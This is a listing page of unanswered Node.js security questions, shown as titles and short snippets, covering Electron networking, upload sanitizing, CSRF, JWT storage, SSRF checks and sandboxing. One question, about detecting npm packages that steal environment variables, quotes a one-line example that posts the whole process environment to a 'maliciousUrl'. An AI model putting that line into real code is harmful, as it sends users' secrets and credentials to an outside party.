All Questions

368 questions with no upvoted or accepted answers
12 votes · 1 answer · 576 views

Disable Networking in Electron

electron.js is a user interface toolkit that allows a web application to operate as an arbitrary GUI. However, there are some applications that should be considered sensitive - for instance, a GUI ...

6 votes · 0 answers · 3k views

Node.js: How do I protect against malicious image file uploads? I.e., how do I implement an image sanitizer in Node?

I am creating a web app using hapi.js that allows users to upload images. I am validating the uploaded images in both the client and server to only allow .jpg/.jpeg, .png, and .gif files. However, I ...

6 votes · 1 answer · 680 views

Design for Mobile Authentication with NodeJS server

I recently struggled with the problem of security and user authentication for an iOS app I'm making, the main problem being how does one allow users to sign up with any 3rd party service (or a ...

5 votes · 2 answers · 743 views

How to securely set database password in Strapi?

The Strapi framework (as far as I understand) requires the database password to be provided at launch. Usually, the password is specified in the database.js file, like this: module.exports = ({ env }) ...

5 votes · 1 answer · 2k views

Security Implications in Electron as a Web Browser

I asked this question a little over a week ago on the Atom forums (link below), and didn't receive a response, so I am reposting it here in the hopes that someone may be able to provide insight on my ...

5 votes · 0 answers · 785 views

I want to store users' profile images in S3 and display them client side - what is the best practice for exposing S3 objects to mobile client?

So I have an Android chat application where users can create profile photos. These photos are sent to my Node JS backend where I upload them to my AWS S3 bucket. I store the key to their image in my ...

5 votes · 1 answer · 1k views

MSCHAPv2 with RADIUS - How exactly does the encrypting process go?

I'm building a RADIUS Server to work with MS-CHAPv2 in node.js. I have a RADIUS Client, which is the VPN Server that sends me the following in an Access-Request: User-Name MS-CHAP-Challenge MS-...

4 votes · 0 answers · 109 views

Supplement for Vm2 js which can securely run untrusted code in languages other than Javascript

I am trying to implement a Node js web app, a simpler version of which is that users submit code files in multiple programming languages like C++, Python, Java, Js etc and the output produced is shown ...

4 votes · 0 answers · 410 views

How to check if URL is public (anti-SSRF)?

I have a form on the site which allows the user to input a URL - the node.js app will then use the request module to fetch that URL, analyze the response, and print some data back to the user. I want to make ...

4 votes · 1 answer · 3k views

node.js csurf invalid csrf token

I'm using npm's csurf module with express. Everything was working perfectly until the last 3 days. Now every time I post a form I get an invalid csrf token error. I'm using the latest versions of csurf and ...

4 votes · 0 answers · 911 views

node.js runInNewContext with untrusted code

According to the node.js vm module docs: Note that running untrusted code is a tricky business requiring great care. To prevent accidental global variable leakage, vm.runInNewContext is quite ...

3 votes · 0 answers · 37 views

Can req.user of passport.js be manipulated?

In my API, whenever I get a request I check the req.user._id which is added to any request when you have nodejs using the passportJS authentication middleware. My question is this: can a hacker ...

3 votes · 0 answers · 188 views

How to get Node to trust root certs in my Windows OS certificate store?

My organization has pre-installed its own root certificates in our machines to enable it to inspect HTTPS traffic. The browsers don't complain since they trust the OS certificates by default. This ...

3 votes · 1 answer · 389 views

Restrict (sandbox) node.js file access

I am developing a web app, and for security reasons I want node to only be able to access a specific folder (and sub-folders). Is this possible?

3 votes · 0 answers · 1k views

NodeJS and AngularJS - Secure REST API with Client Certificate Authentication

I am currently working on making my REST Api Server (NodeJS + Express + Mongoose) secure, so nobody, except my client application (AngularJS 1.6) and my admin application (based on AngularJS 1.6), can ...

3 votes · 0 answers · 3k views

Websocket handshake, JWT understanding security

Hi, I'm trying to understand how this handshake works and JWT. So I have something like a web page where some user can go and log in. Then I create a JWT, so when I make a request to the server I ...

3 votes · 0 answers · 2k views

Definitive regex to secure against path traversal, plus pseudo-code to handle related items

I am creating a webserver framework (in Node.JS), and I want to include path traversal as a built in feature so that the apps don't have to. Perhaps this can become the definitive guide to securing ...

3 votes · 3 answers · 1k views

Securing REST API calls with client-side token

I have a node.js REST API and I want to restrict POST/PUT/DELETE calls to a predefined list of "sources" (web applications which I do not own the code). The only way I see to achieve this is to put ...

3 votes · 1 answer · 5k views

Helmet CSP not working correctly?

Using a Vue SPA distributed by Express. This is my helmet code in the express app: app.use(helmet.contentSecurityPolicy({ directives: { defaultSrc: ["'self'"], styleSrc: ["'self'","'unsafe-inline'" ,'...

2 votes · 0 answers · 1k views

How to fix: Inefficient Regular Expression Complexity in chalk/ansi-regex

sudo npm audit gives me this error - npm audit report ansi-regex >2.1.1 <5.0.1 Severity: moderate Inefficient Regular Expression Complexity in chalk/ansi-regex - https://github.com/advisories/...

2 votes · 0 answers · 21 views

How does Firebase auth really distinguish between a real user and a hacker?

Scenario Fire store model uid1 name :john uid2 name : alex Frontend (react-firebase) Login with credentials Requesting Db to give the name of the user with uid = uid1 and User getting uid from ...

2 votes · 0 answers · 16 views

Are there any tools for software composition analysis with nested package.json files?

As we discovered, npm audit works only with the top-level package.json in the project folder. I've already tested snyk and retire and it seems that they work in a similar way. Perhaps some of you faced the ...

2 votes · 0 answers · 78 views

node.js / express app with cwe-352 vulnerability

I have a simple Node.js / Express app, which receives a cwe-352 vulnerability warning at the following line of code that creates the instance of Express: const app = express(); I have researched this ...

2 votes · 0 answers · 122 views

How to check if any npm packages are stealing environment variables from my system?

Forgive me if this is senseless. But adding a line like this: // to convey the idea I'm using https://www.npmjs.com/package/got got.post(maliciousUrl, {json: process.env}) isn't enough to send the ...

2 votes · 0 answers · 21 views

Give admins app to book a service for a user in another app using some api key

I have two apps set up in node. Both share the same database. So, there is an app for users. Users can see their addresses, wallet, book services etc. There is another app for admins and ops team, where ...

2 votes · 0 answers · 184 views

Can anyone help diagnose what could be causing this (Error: error:0909006C:PEM routines:get_name:no start line) when I start my node app?

I am trying to deploy my site using nginx with a node/express App. I really can't figure out where this is coming from as the only other google hit is for an auth0 issue which I am not using here. For ...

2 votes · 0 answers · 102 views

CSRF Protection when using the Spotify Authorization endpoint

I am trying to implement the ability for my users to link their Spotify account to their profiles in my app. In Spotify's official API docs, it says that the STATE field should be provided when ...

2 votes · 0 answers · 80 views

Trust in docker hub images where content-trust is not maintained

I've recently been examining the possibility of using containers for node applications. Ideally I would like to use --disable-content-trust=false when consuming images. This works when downloading ...

2 votes · 0 answers · 508 views

Where to store access token (JWT) on SPA when server is on another domain

My frontend is on domain1 and backend is on domain2, meaning communication is cross site. On user authentication the server responds with a JWT token. Question is: Where do I safely store that token client-...

2 votes · 0 answers · 139 views

Environment variables size limit beanstalk node.js

I have an aws beanstalk instance with node.js where the limit for the size of the .env is 4096 bytes. I need more than that, there's no way I can fit all the secret keys in this space. Is there a way ...

2 votes · 0 answers · 94 views

Are explicit npm package versions more secure?

Is installing explicit package versions with the flag --save-exact considered to be more secure? I've found a post on Medium https://medium.com/tkssharma/secure-node-js-apps-7613973b6971 (Go to Use ...

2 votes · 0 answers · 81 views

What is the proper way to synchronize/secure sensitive data in my application?

Background I've been out of the web app development realm for a few years and I've recently come back into it. There are a few questions I have about best security practices for performing the ...

2 votes · 2 answers · 975 views

Is there a way to store my MySQL passwords in Node.JS securely?

I am using Node.js for a web application. The app talks directly to MySQL and therefore I need to specify the password to use for the connection; however, this requires the password to be visible in ...

2 votes · 0 answers · 390 views

Is it secure to pass a fixed API key in request body

I am currently building a bot using node.js. I would like to secure one route to only be used for a cronjob task. I looked at all the solutions on the internet and I feel they are overkill for my ...

2 votes · 0 answers · 502 views

Node.js / Websockets - Adding security to server - html client connection

I've created a websocket server using node.js and the ws module: var options = { port: 8080, key: fs.readFileSync('ssl/key.key'), cert: fs.readFileSync('ssl/cert.cert'), ca: fs....

2 votes · 0 answers · 885 views

OAuth2 flow for multiple resource servers

As I'm trying to create a unified OAuth2 system for an internal custom userbase system, a question/problem arose for which I couldn't find fitting documentation: In our microservice application/...

2 votes · 0 answers · 314 views

What are the security considerations for the size of an array that can be passed over HTTP to a JavaScript server?

I'm dealing with the library qs in Node.js, which lets you stringify and parse query strings. For example, if I want to send a query with an array of items, I would do qs.stringify({ items: [1,2,3] })...

2 votes · 1 answer · 70 views

Authentication and Authorization in a product ecosystem

I have a product ecosystem consisting of multiple products, i.e. an angular app, a website and a hybrid app, all powered by a node back end. So, now I want to add a single authentication and ...

2 votes · 0 answers · 179 views

Collection-level access control with mongoose

I am trying to implement collection-level access control using mongoose in my web application. I have created users with different roles. A user with the superadmin role can do anything, however a user with ...

2 votes · 0 answers · 272 views

Syncing ACL permissions in a NodeJS application using MongoDB

Currently using the Node ACL module from: https://github.com/OptimalBits/node_acl This is working a treat but now the requirement is to reflect any changes to our security config in our ACL ...

2 votes · 0 answers · 623 views

Correct way to protect URL with JSON web token

Say I have the following non-api route: app.get('/userprofile', isAuthenticated(), function(request, response) { response.render('pages/userprofile'); }); What is the correct way to protect that ...

2 votes · 0 answers · 230 views

How to use Kerberos in a NodeJS server?

I need to migrate a .net kerberos application to a nodejs environment. The application currently takes an incoming request from a .net client and based on the domain and user within domain they are ...

2 votes · 1 answer · 1k views

Nodejs, PM2, and nginx deploying security?

There are a few guides online that show how to get nodejs running on a server, but they tend to skip over a few details on security. This is a bit of a loaded question, and I'm not sure where to begin....

2 votes · 0 answers · 120 views

REST API Security and CrossPlatform

I'm working on a rest api with node.js. I create a jwt-token in the /signup endpoint. Then I send this token with every ios-app, windowsphone-app request in the Authorization header. So the api tries to find the user which contains ...

2 votes · 0 answers · 279 views

Safe passwords locally with node-webkit

I have to save passwords locally in my application. Unfortunately I can't just hash them because I have to use them every time the application starts. Is there a possibility to save the password and keep ...

2 votes · 1 answer · 3k views

node.js - secure image file upload

We had to implement an image uploader for a node.js project. As a framework we are using express.js. We did it like described here: http://howtonode.org/really-simple-file-uploads But we are not sure ...

2 votes · 1 answer · 399 views

How to securely store and use a customer's AWS Secret Key

Is it acceptable to store a customer's secret key & access key id on my server to allow me to access the AWS API on their behalf? For a password it is simply a matter of using a hash to store an ...

2 votes · 1 answer · 398 views

Run npm script after a package is installed in the project

What I want is a way to run a script after I have installed a package into my project. The postinstall does not work for my case since it runs every time my project is installed somewhere else, which ...

1 vote · 0 answers · 23 views

How to make PostgreSQL queries secure on Heroku

I'm wondering if the following Postgres queries are secure. I seem to have some gaps in a user id table, but I'm not sure what the cause is, so I'd like to make sure these queries are safe from ...

1 vote · 0 answers · 43 views

While using a socket to send and receive passwords, does it encrypt the data?

I'm trying to make a login and sign-up system (I am hashing and salting the password). When I send the password to the server I'm using socket.emit() to send and receive data. Does socket ...

